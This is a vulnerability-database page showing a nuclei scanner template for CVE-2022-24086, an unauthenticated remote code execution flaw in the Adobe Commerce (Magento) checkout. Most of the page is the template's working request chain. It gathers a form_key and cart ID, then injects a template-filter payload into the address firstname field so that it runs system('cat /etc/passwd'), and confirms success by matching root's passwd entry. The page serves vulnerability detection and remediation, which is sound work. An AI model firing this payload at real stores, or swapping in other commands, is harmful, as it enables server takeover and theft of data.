Lucene search
K

Adobe Commerce (Magento) - Remote Code Execution

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Adobe Commerce Magento checkout flaw enables remote code execution with no user interaction; update.

Related
Refs
Code
id: CVE-2022-24086

info:
  name: Adobe Commerce (Magento) - Remote Code Execution
  author: daffainfo
  severity: critical
  description: |
    Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.
  impact: |
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of Adobe Commerce that addresses this vulnerability.
  reference:
    - https://helpx.adobe.com/security/products/magento/apsb22-12.html
    - https://vovohelo.medium.com/reversing-a-magento-rce-cve-2022-24086-e991ead4d8af
    - https://labs.watchtowr.com/adobe-commerce-magento-rce-cve-2022-24086/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24086
    epss-score: 0.99199
    epss-percentile: 0.99929
    cwe-id: CWE-20
    cpe: cpe:2.3:a:adobe:commerce:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: adobe
    product: commerce
    shodan-query: "X-Magento-Tags"
  tags: cve,cve2022,adobe,magento,commerce,rce,intrusive,kev,vkev

variables:
  random_str: '{{rand_base(5, "abc")}}'
  email: '{{randstr}}@{{rand_base(5)}}.com'
  telephone: "{{rand_int(10000, 99999)}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(to_lower(body), "x-magento", "form_key")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: form_key
        part: body
        group: 1
        regex:
          - 'name="form_key"\s+type="hidden"\s+value="([0-9a-zA-Z]+)"'
        internal: true

  - raw:
      - |
        POST /checkout/cart/add/uenc/{{base64(BaseURL)}}%2C/product/{{product_id}}/ HTTP/1.1
        Host: {{Hostname}}
        Cookie: form_key={{form_key}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2gMM6E6ZIRMtnlg4

        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="product"

        {{product_id}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="item"

        {{product_id}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4
        Content-Disposition: form-data; name="form_key"

        {{form_key}}
        ------WebKitFormBoundary2gMM6E6ZIRMtnlg4--

    matchers:
      - type: dsl
        dsl:
          - contains(content_type, "application/json")
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /checkout HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(to_lower(body), "entity_id", "store_id", "formkey")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: entity_id
        part: body
        group: 1
        regex:
          - '"entity_id":"([0-9a-zA-Z]+)","store'
        internal: true

  - raw:
      - |
        POST /rest/default/V1/guest-carts/{{entity_id}}/shipping-information HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"addressInformation":{"shipping_address":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}"},"billing_address":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}","saveInAddressBook":null},"shipping_method_code":"flatrate","shipping_carrier_code":"flatrate","extension_attributes":{}}}

    skip-variables-check: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "payment_methods", "totals")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /rest/default/V1/guest-carts/{{entity_id}}/payment-information HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"cartId":"{{entity_id}}","billingAddress":{"countryId":"FR","regionCode":"","region":"","street":["{{random_str}}"],"company":"","telephone":"{{telephone}}","postcode":"12311","city":"{{random_str}}","firstname":"{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cat$IFS/etc/passwd)}}","lastname":"{{random_str}}","saveInAddressBook":null},"paymentMethod":{"method":"checkmo","po_number":null,"additional_data":null},"email":"{{email}}"}

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b8527b3865600823b06c98651a44c9315397f0c9a50362e139a3cd2df0bd561d022100cd40b365e827eee339dedbf730a69ea7c611941f9a4d372fc1dc3dc4ec599d4e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 210
CVSS 3.19.8
EPSS0.99199
SSVC
23